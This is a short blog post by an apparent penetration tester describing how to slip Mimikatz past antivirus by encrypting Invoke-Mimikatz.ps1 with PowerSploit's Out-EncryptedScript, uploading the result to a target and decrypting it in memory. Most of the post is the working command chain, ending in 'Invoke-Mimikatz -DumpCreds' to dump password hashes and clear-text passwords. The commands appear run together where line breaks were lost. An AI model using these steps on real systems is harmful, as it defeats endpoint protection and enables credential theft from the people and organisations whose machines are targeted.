Saturday, September 10, 2016

[Quick Notes] Powersploit - AV Evasion

[Quick Notes] Powersploit - AV Evasion

On my pentest engagements, I primarily use Powershell (PS) & PS based exploitation tools & frameworks like CME, Empire, Powersploit, Nishang, Veil, etc, along with Metasploit & other tools.

This short writeup is one of the AV evasion scenarios. Posting here for reference.

Objective is to dump hashes & clear-text passwords from memory (use Mimikatz). Any decent Anti-Virus blocks any attempts to read / update / execute Invoke-Mimikatz.ps1.

Enter - PowerSploit's Out-EncryptedScript.ps1. Use the script to encrypt the any malicious file (text/ps1) offline (attacker's box) and upload it to the target. The script takes in a password and a salt to encrypt the file.

Out-EncryptedScript will encrypt a script (or any text file for thatmatter) and output the results to a minimally obfuscated script -evil.ps1 by default.
Out-EncryptedScript .\Invoke-Mimikatz.ps1 password salty

A new, encrypted ps script - evil.ps1 - is generated.

Read the file contents and execute the script from memory.
[String] $cmd = Get-Content .\evil.ps1Invoke-Expression $cmd$decrypted = de password saltyiex $decrypted; Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz.ps1 executes successfully.


No comments:

Post a Comment


The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.